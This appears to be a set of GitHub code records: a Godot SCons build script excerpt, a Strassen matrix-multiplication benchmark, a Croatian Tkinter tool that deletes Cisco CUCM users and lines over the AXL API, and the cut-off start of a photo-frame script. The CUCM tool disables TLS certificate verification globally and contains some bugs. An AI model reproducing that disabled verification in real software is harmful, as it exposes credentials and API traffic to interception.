env.Append(CPPDEFINES=[\"TOOLS_ENABLED\"])\n methods.write_disabled_classes(env[\"disable_classes\"].split(\",\"))\n if env[\"disable_3d\"]:\n if env[\"tools\"]:\n print(\n \"Build option 'disable_3d=yes' cannot be used with 'tools=yes' (editor), \"\n \"only with 'tools=no' (export template).\"\n )\n Exit(255)\n else:\n env.Append(CPPDEFINES=[\"_3D_DISABLED\"])\n if env[\"disable_advanced_gui\"]:\n if env[\"tools\"]:\n print(\n \"Build option 'disable_advanced_gui=yes' cannot be used with 'tools=yes' (editor), \"\n \"only with 'tools=no' (export template).\"\n )\n Exit(255)\n else:\n env.Append(CPPDEFINES=[\"ADVANCED_GUI_DISABLED\"])\n if env[\"minizip\"]:\n env.Append(CPPDEFINES=[\"MINIZIP_ENABLED\"])\n\n editor_module_list = [\"freetype\"]\n if env[\"tools\"] and not env.module_check_dependencies(\"tools\", editor_module_list):\n print(\n \"Build option 'module_\"\n + x\n + \"_enabled=no' cannot be used with 'tools=yes' (editor), only with 'tools=no' (export template).\"\n )\n Exit(255)\n\n if not env[\"verbose\"]:\n methods.no_verbose(sys, env)\n\n GLSL_BUILDERS = {\n \"RD_GLSL\": env.Builder(\n action=env.Run(glsl_builders.build_rd_headers, 'Building RD_GLSL header: \"$TARGET\"'),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n ),\n \"GLSL_HEADER\": env.Builder(\n action=env.Run(glsl_builders.build_raw_headers, 'Building GLSL header: \"$TARGET\"'),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n ),\n }\n env.Append(BUILDERS=GLSL_BUILDERS)\n\n if not env[\"platform\"] == \"server\":\n env.Append(\n BUILDERS={\n \"GLES3_GLSL\": env.Builder(\n action=run_in_subprocess(gles3_builders.build_gles3_headers),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n )\n }\n )\n\n scons_cache_path = os.environ.get(\"SCONS_CACHE\")\n if scons_cache_path != None:\n CacheDir(scons_cache_path)\n print(\"Scons cache enabled... (path: '\" + scons_cache_path + \"')\")\n\n if env[\"vsproj\"]:\n env.vs_incs = []\n env.vs_srcs = []\n\n Export(\"env\")\n\n # Build subdirs, the build order is dependent on link order.\n SConscript(\"core/SCsub\")\n SConscript(\"servers/SCsub\")\n SConscript(\"scene/SCsub\")\n SConscript(\"editor/SCsub\")\n SConscript(\"drivers/SCsub\")\n\n SConscript(\"platform/SCsub\")\n SConscript(\"modules/SCsub\")\n if env[\"tests\"]:\n SConscript(\"tests/SCsub\")\n SConscript(\"main/SCsub\")\n\n SConscript(\"platform/\" + selected_platform + \"/SCsub\") # Build selected platform.\n\n # Microsoft Visual Studio Project Generation\n if env[\"vsproj\"]:\n env[\"CPPPATH\"] = [Dir(path) for path in env[\"CPPPATH\"]]\n methods.generate_vs_project(env, GetOption(\"num_jobs\"))\n methods.generate_cpp_hint_file(\"cpp.hint\")\n\n # Check for the existence of headers\n conf = Configure(env)\n if \"check_c_headers\" in env:\n for header in env[\"check_c_headers\"]:\n if conf.CheckCHeader(header[0]):\n env.AppendUnique(CPPDEFINES=[header[1]])\n\nelif selected_platform != \"\":\n if selected_platform == \"list\":\n print(\"The following platforms are available:\\n\")\n else:\n print('Invalid target platform \"' + selected_platform + '\".')\n print(\"The following platforms were detected:\\n\")\n\n for x in platform_list:\n print(\"\\t\" + x)\n\n print(\"\\nPlease run SCons again and select a valid platform: platform=\")\n\n if selected_platform == \"list\":\n # Exit early to suppress the rest of the built-in SCons messages\n Exit()\n else:\n Exit(255)\n\n# The following only makes sense when the 'env' is defined, and assumes it is.\nif \"env\" in locals():\n methods.show_progress(env)\n # TODO: replace this with `env.Dump(format=\"json\")`\n # once we start requiring SCons 4.0 as min version.\n methods.dump(env)\n\n\ndef print_elapsed_time():\n elapsed_time_sec = round(time.time() - time_at_start, 3)\n time_ms = round((elapsed_time_sec % 1) * 1000)\n print(\"[Time elapsed: {}.{:03}]\".format(time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time_sec)), time_ms))\n\n\natexit.register(print_elapsed_time)\n","repo_name":"MrJustreborn/godot4_webcam","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":32727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"23099715030","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 20 17:29:30 2019\r\n\r\n@author: bjwil\r\n\"\"\"\r\nimport numpy as np\r\n\r\n#a = np.matrix('1 2 3 4; 4 4 4 4; 4 3 2 1; 1 2 3 4')\r\n#b = np.matrix('1 1 1 1; 2 2 2 2; 3 3 3 3; 4 4 4 4')\r\nrows = cols = 2\r\na = np.matrix(np.random.randint(0,10, size=(rows, cols)))\r\nb = np.matrix(np.random.randint(0,10, size=(rows, cols)))\r\n#n = 2\r\n#k = 4\r\n#np.matmul(a[0:n,0:n], b[0:n, n:k])\r\ndef smm(a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n for k in range(0,n):\r\n c[i,j] = c[i,j] + (a[i,k] * b[k,j])\r\n \r\n return c\r\n\r\n\r\ndef smmr(a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n if n == 1:\r\n c[0,0] = a[0,0] * b[0,0]\r\n else:\r\n n = int(n/2)\r\n k = int(len(c))\r\n c[0:n, 0:n] = smmr(a[0:n,0:n], b[0:n,0:n]) + smmr(a[0:n, n:k], b[n:k,0:n])\r\n \r\n c[0:n, n:k] = smmr(a[0:n,0:n], b[0:n, n:k]) + smmr(a[0:n, n:k], b[n:k, n:k])\r\n \r\n c[n:k, 0:n] = smmr(a[n:k,0:n], b[0:n,0:n]) + smmr(a[n:k, n:k], b[n:k,0:n])\r\n \r\n c[n:k, n:k] = smmr(a[n:k,0:n], b[0:n, n:k]) + smmr(a[n:k, n:k], b[n:k, n:k])\r\n \r\n return c\r\n\r\nclass Strassen():\r\n \r\n def __init__(self):\r\n self.multiplications = 0\r\n \r\n def strassen_smmr(self, a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n if n == 1:\r\n c[0,0] = a[0,0] * b[0,0]\r\n self.multiplications += 1\r\n else:\r\n n = int(n/2)\r\n k = int(len(c))\r\n a11 = a[0:n,0:n]\r\n a12 = a[0:n, n:k]\r\n a21 = a[n:k,0:n]\r\n a22 = a[n:k,n:k]\r\n b11 = b[0:n,0:n]\r\n b12 = b[0:n, n:k]\r\n b21 = b[n:k,0:n]\r\n b22 = b[n:k,n:k]\r\n \r\n \r\n s1 = b12 - b22\r\n s2 = a11 + a12\r\n s3 = a21 + a22\r\n s4 = b21 - b11\r\n s5 = a11 + a22\r\n s6 = b11 + b22\r\n s7 = a12 - a22\r\n s8 = b21 + b22\r\n s9 = a11 - a21\r\n s10 = b11 + b12\r\n \r\n p1 = self.strassen_smmr(a11, s1)\r\n p2 = self.strassen_smmr(s2, b22)\r\n p3 = self.strassen_smmr(s3, b11)\r\n p4 = self.strassen_smmr(a22, s4)\r\n p5 = self.strassen_smmr(s5, s6)\r\n p6 = self.strassen_smmr(s7, s8)\r\n p7 = self.strassen_smmr(s9, s10)\r\n \r\n c[0:n,0:n] = p5 + p4 - p2 + p6\r\n c[0:n, n:k] = p1 + p2\r\n c[n:k,0:n] = p3 + p4\r\n c[n:k,n:k] = p5 + p1 - p3 - p7\r\n \r\n return c\r\n\r\n\r\n\r\nimport timeit, functools\r\n\r\nsm = 7\r\ntimes = 100\r\n\r\nindex = [i for i in range(0, sm)]\r\narray_1 = []\r\narray_2 = []\r\narray_3 = []\r\n#i = 2\r\nfor i in range(0, sm):\r\n a = np.floor(np.random.rand(2**i,2**i)*10)\r\n b = np.floor(np.random.rand(2**i,2**i)*10)\r\n \r\n sm1 = timeit.Timer(functools.partial(smm, a, b)) \r\n array_1.append(sm1.timeit(times)) \r\n \r\n sm2 = timeit.Timer(functools.partial(smmr, a, b)) \r\n array_2.append(sm2.timeit(times))\r\n \r\n test = Strassen()\r\n sm3 = timeit.Timer(functools.partial(test.strassen_smmr, a, b)) \r\n array_3.append(sm3.timeit(times)) \r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndf = pd.DataFrame({'matrix_order': [2**i for i in index], \r\n 'smmNonRecursive' : array_1,\r\n 'smmRecursive': array_2, \r\n 'strassen' : array_3,\r\n })\r\n# gca stands for 'get current axis'\r\nax = plt.gca()\r\ndf.plot(kind='line',x='matrix_order',y='smmNonRecursive', color='green', ax=ax)\r\ndf.plot(kind='line',x='matrix_order',y='smmRecursive',ax=ax)\r\ndf.plot(kind='line',x='matrix_order',y='strassen', color='red', ax=ax)\r\nplt.ylabel(\"seconds\")\r\nplt.title(\"Comparison for Matrix Methods: {} runs\".format(times))\r\nplt.show()\r\n","repo_name":"BJWiley233/Practical-Computer-Concepts-Files","sub_path":"Python/SquareMatrixMultiplyRecursive.py","file_name":"SquareMatrixMultiplyRecursive.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10816838838","text":"from tkinter import *\nfrom tkinter import messagebox\nimport ssl\nimport urllib\nimport requests\nimport suds\nimport urllib3\nfrom suds.client import Client\nimport xml.etree.cElementTree as ET\nfrom tkinter import ttk\nimport pyperclip\nimport pyautogui as pya\nimport time\n\nroot = Tk()\nroot.title(\"CUCM Functions\")\nroot.resizable(0, 0)\n\nstyle = ttk.Style()\nstyle.configure(\"BW.TLabel\", foreground=\"black\", background=\"white\")\n\nstyle.map(\"C.TButton\",\n foreground=[('pressed', 'red'), ('active', 'blue')],\n background=[('pressed', '!disabled', 'black'), ('active', 'white')]\n )\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nusername = 'username'\npassword = 'password'\ncucm = 'http://0.0.0.0//axl/'\nwsdl = 'file:///D:/axlsqltoolkit/schema/11.5/AXLAPI.wsdl'\n\n\n# vraca sve brojeve koji se ne koriste u DirectoryNumber-u\ndef difference_list(extension_range, clean_list_numbers):\n return [item for item in extension_range if item not in clean_list_numbers]\n\n\n# vraca sve brojeve koji nisu upisani u listu shared_line_extenstion\ndef shared_line(free_agent_extensions, shared_line_exstension):\n return [item for item in free_agent_extensions if item not in shared_line_exstension]\n\n\n# vraca sve brojeve koji nisu upisani u listu reserved_line\ndef reserved_line(shared_line_extensions, reserved_line_extensions):\n return [item for item in shared_line_extensions if item not in reserved_line_extensions]\n\n\n# CCM\n\n\ndef get_ccm_version(client):\n return client.service.getCCMVersion\n\n\n# DIRECTORY NUMBER\n\n\ndef get_directory_number_by_number(client, pattern, routePartitionName):\n return client.service.getLine(pattern=pattern, routePartitionName=routePartitionName)\n\n\ndef get_directory_number_by_description(client, description, routePartitionName):\n return client.service.GetLineReq(description=description, routePartitionName=routePartitionName)\n\n\ndef remove_directory_number_by_number(client, pattern, routePartitionName):\n return client.service.removeLine(pattern=pattern, routePartitionName=routePartitionName)\n\n\ndef list_directory_number(client, pattern):\n return client.service.listLine(pattern=pattern)\n\n\n# END USER PROFILE\n\n\ndef get_end_user_by_name(client, name):\n return client.service.getUser(userid=name)\n\n\ndef remove_end_user_by_userid(client, name):\n return client.service.removeUser(userid=name)\n\n\n# DEVICE PROFILE\n\n\ndef get_device_by_name(client, name):\n return client.service.getDeviceProfile(name=name)\n\n\ndef remove_device_by_name(client, name):\n return client.service.removeDeviceProfile(name=name)\n\n\ndef list_listDeviceProfile(client, name):\n return client.service.listDeviceProfile(name=name)\n\n\n# PHONE PROFILE\n\n\ndef get_phone_by_name(client, name):\n return client.service.getPhone(name=name)\n\n\ndef remove_phone_by_name(client, name):\n return client.service.removePhone(name=name)\n\n\ndef update_phone_by_name(client, name, description):\n return client.service.updatePhone(**{'name': name, 'description': description})\n\n\ndef list_phones(client):\n return client.service.listPhone\n\n\ndef ask_user():\n user_input = str(input(\"Opcije: \\n 1. Get device name \\n 2. Get phone \\n\"))\n return user_input\n\n\ndef directory_number_pull_ph():\n login_url = 'https://0.0.0.0/axl/'\n cucm_version_actions = 'CUCM:DB ver=11.5 listLine'\n username = 'username'\n password = r'password'\n soap_data = '' \\\n '%%' \\\n ' '\n soap_headers = {'Content-type': 'text/xml', 'SOAPAction': cucm_version_actions}\n\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\n\n try:\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHERS_LIST += 'HIGH:!DH:!aNULL'\n except AttributeError:\n # nije pyopenssl support koristena / potrebna / moguca\n pass\n\n try:\n axl_request = requests.post(login_url, data=soap_data, headers=soap_headers, verify=False,\n auth=(username, password))\n except ConnectionError:\n print(\"Za prikaz slobodnih ekstenzija potreban je VPN\")\n plain_txt = axl_request.text\n root = ET.fromstring(plain_txt)\n\n list_numbers = []\n extension_range_zagreb = list(range(8500, 8599)) + list(range(8700, 8800)) + [4111, 4801, 4804]\n shared_line_exstension_zagreb = []\n reserved_line_exstenion_zagreb = [8570, 8579, 8581, 8583, 8590, 8595, 8598, 8700, 8740, 8750, 8760, 8770, 8780,\n 8790]\n\n extension_range_split = list(range(8600, 8700))\n shared_line_exstension_split = [8603, 8607, 8615]\n\n for device in root.iter('line'):\n list_numbers.append(device.find('pattern').text)\n # Za prikaz kome broj pripada\n # list_description.append(device.find('description').text)\n\n list_without_quotes = []\n\n for line in list_numbers:\n line = line.replace(\"'\", \"\").replace(\"*\", \"\")\n list_without_quotes.append(line)\n\n clean_list_numbers = [int(i) for i in list_without_quotes]\n\n # nema rezerviranih brojeva u splitu\n free_agent_extensions_split = difference_list(extension_range_split, clean_list_numbers)\n shared_line_numbers_split = shared_line(free_agent_extensions_split, shared_line_exstension_split)\n\n free_agent_extensions_zagreb = difference_list(extension_range_zagreb, clean_list_numbers)\n shared_line_numbers_zagreb = shared_line(free_agent_extensions_zagreb, shared_line_exstension_zagreb)\n reserver_line_numbers_zagreb = reserved_line(shared_line_numbers_zagreb, reserved_line_exstenion_zagreb)\n\n return reserver_line_numbers_zagreb + ' Split: ' + shared_line_exstension_split\n\n\ndef directory_number_pull_isk():\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n login_url = 'https://0.0.0.0/axl/'\n cucm_version_actions = 'CUCM:DB ver=11.5 listLine'\n username = 'username'\n password = r'password'\n soap_data = '' \\\n '%%' \\\n ' '\n soap_headers = {'Content-type': 'text/xml', 'SOAPAction': cucm_version_actions}\n\n axl_request = requests.post(login_url, data=soap_data, headers=soap_headers, verify=False,\n auth=(username, password))\n plain_txt = axl_request.text\n root = ET.fromstring(plain_txt)\n\n list_numbers = []\n extension_range = list(range(100, 599)) + [701, 802, 839, 847, 857, 876, 877, 878, 881, 927, 967]\n shared_line_exstension = [130, 170]\n reserved_line_exstenion = [108, 150, 205, 259, 300, 320, 330, 334, 394, 398, 399, 480, 481, 482, 483, 484, 485,\n 486, 487, 488, 489, 570, 571, 573, 574, 575, 577, 578, 579, 580, 590, 702]\n\n for device in root.iter('line'):\n list_numbers.append(device.find('pattern').text)\n # Za prikaz kome broj pripada\n # list_description.append(device.find('description').text)\n\n list_without_quotes = []\n\n for line in list_numbers:\n line = line.replace(\"'\", \"\").replace(\"*\", \"\")\n list_without_quotes.append(line)\n\n clean_list_numbers = [int(i) for i in list_without_quotes]\n\n free_agent_extensions = difference_list(extension_range, clean_list_numbers)\n shared_line_numbers = shared_line(free_agent_extensions, shared_line_exstension)\n reserver_line_numbers = reserved_line(shared_line_numbers, reserved_line_exstenion)\n\n return reserver_line_numbers\n\n\ndef deactivation_agent_isk_GUI_2(first_last_name, username):\n while True:\n try:\n route_partition_name_isk= 'PT_isk_Internal'\n device_profile_isk = ' Device Profile 6941'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_isk)\n if device_profile is None:\n print(\"Ne postoji korisnik pod imenom \" + first_last_name)\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n print(\"Ne postoji broj od \" + first_last_name)\n remove_device_by_name(cucm_server, first_last_name + device_profile_isk)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_isk)\n except suds.transport.TransportError:\n print(\"Korisnik \" + first_last_name + \" nije pronaden\")\n except urllib.error.HTTPError:\n print(\"HTTP error\")\n except suds.WebFault:\n print(\"Korinsik \" + first_last_name + \" ne postoji\")\n\n\ndef deactivation_agent_ph_GUI(first_last_name, username):\n # while True:\n # try:\n route_partition_name_ph = 'PT_Internal'\n device_profile_ph = ' Device Profile'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_ph)\n if device_profile is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji korisnik pod imenom\" + first_last_name)\n # break\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji broj od \" + first_last_name)\n # break\n remove_device_by_name(cucm_server, first_last_name + device_profile_ph)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_ph)\n\n\n# except suds.transport.TransportError:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" nije pronaden\")\n# break\n# except urllib.error.HTTPError:\n# messagebox.showwarning(\"Obavijest\", \"HTTP error\")\n# break\n# except suds.WebFault:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" ne postoji\")\n# break\n\n\ndef deactivation_agent_isk_GUI(first_last_name, username):\n # while True:\n # try:\n route_partition_name_isk = 'PT_Isk_Internal'\n device_profile_isk = ' Device Profile 6941'\n cucm_server = Client(wsdl, location=cucm, username=username,\n password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_isk)\n if device_profile is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji korisnik pod imenom \" + first_last_name)\n # break\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji broj od \" + first_last_name)\n # break\n remove_device_by_name(cucm_server, first_last_name + device_profile_isk)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_isk)\n\n\n# except suds.transport.TransportError:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" nije pronaden\")\n# break\n# except urllib.error.HTTPError:\n# messagebox.showwarning(\"Obavijest\", \"HTTP error\")\n# break\n# except suds.WebFault:\n# messagebox.showwarning(\"Obavijest\", \"Korinsik \" + str(first_last_name) + \" ne postoji\")\n# break\n\n\ndef deactivation_agent_ph_old():\n while True:\n try:\n route_partition_name_ph = 'PT_Internal'\n device_profile_ph = ' Device Profile'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n user_first_last_name = str(input(\"Unesi ime i prezime agenta: \"))\n user_username = str(input(\"Unesi korisničko ime agenta (username): \"))\n\n device = get_device_by_name(cucm_server, user_first_last_name + device_profile_ph)\n device_number = (int(device['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n print(\"Ne postoji broj kod traženog agenta!\")\n remove_device_by_name(cucm_server, user_first_last_name + device_profile_ph)\n remove_end_user_by_userid(cucm_server, user_username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_ph)\n print(\"Uspješno odjavljen agent \" + user_first_last_name)\n except suds.transport.TransportError:\n print(\"Agent \" + user_first_last_name + \" nije pronađen\")\n except urllib.error.HTTPError:\n print(\"HTTP error\")\n except suds.WebFault:\n print(\"Agent \" + user_first_last_name + \" ne postoji\")\n\n\ndef show_isk_extensions():\n list1.delete(0.0, END)\n try:\n d = directory_number_pull_isk()\n except ConnectionError:\n messagebox.showwarning(\"Obavijest\", \"Problem kod konekcije, provjeri VPN\")\n list1.insert(END, d)\n\n\ndef show_ph_extensions():\n list1.delete(0.0, END)\n try:\n t = directory_number_pull_ph()\n except ConnectionError:\n messagebox.showwarning(\"Obavijest\", \"Problem kod konekcije, provjeri VPN\")\n list1.insert(END, t)\n\n\ndef deactivation_agent_isk():\n if len(first_last_name_text.get()) >= 5 and len(username_text.get()) >= 3:\n first_last_entry = str(first_last_name_text.get())\n username_entry = str(username_text.get())\n deactivation_agent_isk_GUI(first_last_entry, username_entry)\n messagebox.showwarning(\"Obavijest\", \"Uspješno odjavljen korisnik \" + first_last_entry)\n e1.delete(0, END)\n e2.delete(0, END)\n else:\n messagebox.showwarning(\"Obavijest\", \"Naziv agenta ili Username nije upisan!\")\n\n\ndef deactivation_agent_ph():\n if len(first_last_name_text.get()) >= 5 and len(username_text.get()) >= 3:\n first_last_entry = str(first_last_name_text.get())\n username_entry = str(username_text.get())\n deactivation_agent_ph_GUI(first_last_entry, username_entry)\n messagebox.showinfo(\"Obavijest\", \"Uspješno odjavljen korisnik \" + first_last_entry)\n e1.delete(0, END)\n e2.delete(0, END)\n else:\n messagebox.showwarning(\"Obavijest\", \"Naziv agenta ili Username nije upisan!\")\n\n\n# radi!\ndef radi_li_textbox():\n entry_test = first_last_name_text.get()\n print(entry_test)\n e1.delete(0, END)\n\n\ndef leftClick(event):\n print(\"Left\")\n\n\ndef middleClick(event):\n print(\"Middle\")\n\n\n#def copy_text_to_clipboard(event):\n # field_value = event.widget.get(\"1.0\", 'end-1c') # get field value from event, but remove line return at end\n # root.clipboard_clear() # clear clipboard contents\n # root.clipboard_append(field_value) # append new value to clipbaord\n\n\ndef rightClick(event):\n print(\"Right\")\n\n\ndef popup(event):\n try:\n popup_menu.tk_popup(event.x_root, event.y_root, 0)\n finally:\n popup_menu.grab_release()\n\n\ndef copy_clipboard():\n pya.hotkey('ctrl', 'c')\n time.sleep(.01) # ctrl-c is usually very fast but your program may execute faster\n return pyperclip.paste()\n\n\npya.doubleClick(pya.position())\n\n\ndef copy_highlighted():\n list = []\n var = copy_clipboard()\n list.append(var)\n return list\n\n\npopup_menu = Menu(tearoff=0)\npopup_menu.add_command(label=\"Copy\", command=copy_highlighted)\n\n# root.bind(\"\", leftClick)\n# root.bind(\"\", middleClick)\nroot.bind(\"\", popup)\nroot.grid()\n\nlbl1 = ttk.Label(root, text=\"Ime i prezime:\")\nlbl1.grid(row=0, sticky=W)\n\nlbl2 = ttk.Label(root, text=\"Korisničko ime:\")\nlbl2.grid(row=1, sticky=W)\n\nfirst_last_name_text = StringVar()\ne1 = Entry(root, textvariable=first_last_name_text)\ne1.grid(row=0, column=1, ipadx=37, sticky=W)\ne1.focus()\n\nusername_text = StringVar()\ne2 = Entry(root, textvariable=username_text)\ne2.grid(row=1, column=1, ipadx=37, sticky=W)\n\nlist1 = Text(root, height=6, width=35)\nlist1.grid(row=2, column=0, rowspan=8, columnspan=2)\n\nsb1 = Scrollbar(root)\nsb1.grid(row=2, column=2, rowspan=6)\n\nlist1.configure(yscrollcommand=sb1.set)\nsb1.configure(command=list1.yview)\n\nb1 = ttk.Button(root, text=\"Odjaviti isk agenta\", width=25, style=\"C.TButton\", command=deactivation_agent_isk)\nb1.grid(row=2, column=3)\n\nb2 = ttk.Button(root, text=\"Odjaviti ph agenta\", width=25, style=\"C.TButton\", command=deactivation_agent_ph)\nb2.grid(row=3, column=3)\n\nb3 = ttk.Button(root, text=\"Slobodne ekstenzije isk\", width=25, style=\"C.TButton\", command=show_isk_extensions)\nb3.grid(row=4, column=3)\n\nb4 = ttk.Button(root, text=\"Slobodne ekstenzije ph\", width=25, style=\"C.TButton\", command=show_ph_extensions)\nb4.grid(row=5, column=3)\n\nb5 = ttk.Button(root, text=\"Zatvoriti\", width=25, style=\"C.TButton\", command=root.destroy)\nb5.grid(row=6, column=3)\n\nroot.mainloop()\n","repo_name":"hi-im-phillip/CUCM-desktop-app","sub_path":"DeaktivacijaOdjavaGUI.py","file_name":"DeaktivacijaOdjavaGUI.py","file_ext":"py","file_size_in_byte":17523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32975832198","text":"from __future__ import print_function\n\nfrom contextlib import contextmanager\nimport config\nimport locale\nimport threading\nimport time\n\n#for Python 3\nfrom tkinter import *\nfrom smb.SMBConnection import SMBConnection\n\n#for Python 2.7\n#from Tkinter import *\n#from smb import *\n#from SMBConnection import *\n\n#for photos\nfrom PIL import Image, ImageTk\nfrom PIL.ExifTags import TAGS\nimport random\nimport tempfile\nimport io\n\n#for news\nimport feedparser\n\n#for calendar\nimport os\nimport datetime\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\n#so we can break from a deep loop\nclass ContinueI(Exception):\n pass\n \ncontinue_i = ContinueI()\n\n\n#--------functions\ndef GetDirs(conn, share, directory):\n print(directory)\n sharedfiles = conn.listPath(share_name, directory)\n dirs = []\n skipdirs = config.skip_directories\n for sharedfile in sharedfiles:\n try:\n #skip \n for skipdir in skipdirs:\n if sharedfile.filename == skipdir:\n raise continue_i\n except ContinueI:\n continue\n \n if sharedfile.isDirectory:\n newdir = directory + '/' + sharedfile.filename\n dirs.append(newdir)\n if config.recursive_dirs:\n dirs = dirs + GetDirs(conn, share, newdir)\n return dirs\n\n@contextmanager \ndef setlocale(name): #thread proof function to work with locale\n with LOCALE_LOCK:\n saved = locale.setlocale(locale.LC_ALL)\n try:\n yield locale.setlocale(locale.LC_ALL, name)\n finally:\n locale.setlocale(locale.LC_ALL, saved)\n\ndef getEXIF(img):\n ret = {}\n info = img._getexif()\n if info is not None:\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n ret[str(decoded).lower()] = value\n return ret \n\ndef printEXIF(img):\n tags = getEXIF(img)\n try:\n for tag, value in tags.items():\n print(\"{\" + str(tag) + \"}[\" + str(value) + \"]\\n\")\n except:\n print(\"can't get EXIF information\\n\") \n \n#calendar funtions\ndef suffix(d):\n return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\ndef custom_strftime(format, t):\n return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))\n \n\n#--------main\nLOCALE_LOCK = threading.Lock()\n\n#set up constants\nscreen_base_width = config.screen_width\nscreen_base_height = config.screen_height\nscreen_multiplier = 1 #/1.875\nscreen_width = screen_base_width * screen_multiplier\nscreen_height = screen_base_height * screen_multiplier\nscreen_tuple = (screen_width,screen_height)\nscreen_ratio = screen_width/screen_height\nmillis_between_calendar_checks = 1000 * 60 *30\n\nui_locale = '' # e.g. 'fr_FR' fro French, '' as default\ntime_format = 12 # 12 or 24\ndate_format = \"%b %d, %Y\" # check python doc for strftime() for options\nnews_country_code = 'us'\nweather_api_token = '' # create account at https://darksky.net/dev/\nweather_lang = 'en' # see https://darksky.net/dev/docs/forecast for full list of language parameters values\nweather_unit = 'us' # see https://darksky.net/dev/docs/forecast for full list of unit parameters values\nlatitude = None # Set this if IP location lookup does not work for you (must be a string)\nlongitude = None # Set this if IP location lookup does not work for you (must be a string)\nxlarge_text_size = 48\nlarge_text_size = 24\nmedium_text_size = 16\nsmall_text_size = 8\n\n\n#for calendar\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar API Python Quickstart'\nphotoIsPortrait = True\n\n\nclass Photo(Frame):\n def __init__(self, parent, *args, **kwargs):\n self.parent=parent\n Frame.__init__(self, parent, bg='black')\n imageTemp=None\n self.panel1 = Label(self, image=imageTemp)\n self.panel1.pack(side='top', fill='both', expand='yes')\n self.flip()\n \n def flip(self):\n #find a photo to display\n photo_path = ''\n while photo_path == '':\n #get a random directory\n randomDir = random.choice(dirs)\n #get list of jpgs\n print(\"rd\" + randomDir)\n try:\n sharedphotos = conn.listPath(share_name, randomDir,pattern=\"*.jpg\")\n if sharedphotos == None:\n continue\n except:\n continue\n #pick one at random\n photo = random.choice(sharedphotos)\n photo_path = randomDir + '/' + photo.filename\n\n #read a photo to memory\n fp = io.BytesIO()\n file_attrs, retrlen = conn.retrieveFile(share_name,photo_path,fp)\n fp.seek(0)\n\n #resize the photo and setup for display\n try:\n imageRaw = Image.open(fp)\n except:\n print(\"Could not open:\" + photo_path)\n fp.close()\n self.flip()\n return\n\n #print exif info\n exif = getEXIF(imageRaw)\n\n if exif == None:\n print(\"could not get exif for \" + photo_path + \"\\n\")\n else:\n image_date = exif.get('datetime',\"\")\n image_orientation = exif.get('orientation',1)\n \n #rotate first \n if image_orientation == 3:\n imageRot = imageRaw.rotate(180)\n print(\"Rotating \" + photo_path + \"\\n\")\n elif image_orientation == 6:\n imageRot= imageRaw.rotate(270)\n print(\"Rotating \" + photo_path + \"\\n\")\n elif image_orientation == 8:\n imageRot = imageRaw.rotate(90)\n print(\"Rotating \" + photo_path + \"\\n\")\n else:\n imageRot = imageRaw\n\n #now find the image aspect ratio and size\n image_s = imageRot.size \n image_w = image_s[0]\n image_h = image_s[1]\n\n ratio = float(image_w)/float(image_h)\n\n if ratio < screen_ratio: #height is the constraint (portrait)\n h = int(screen_height)\n w = int(h*ratio)\n photoIsPortrait = True\n else: #width is the constraint\n w = int(screen_width)\n h = int(w/ratio)\n photoIsPortrait = False\n\n #then resize\n imageRR = 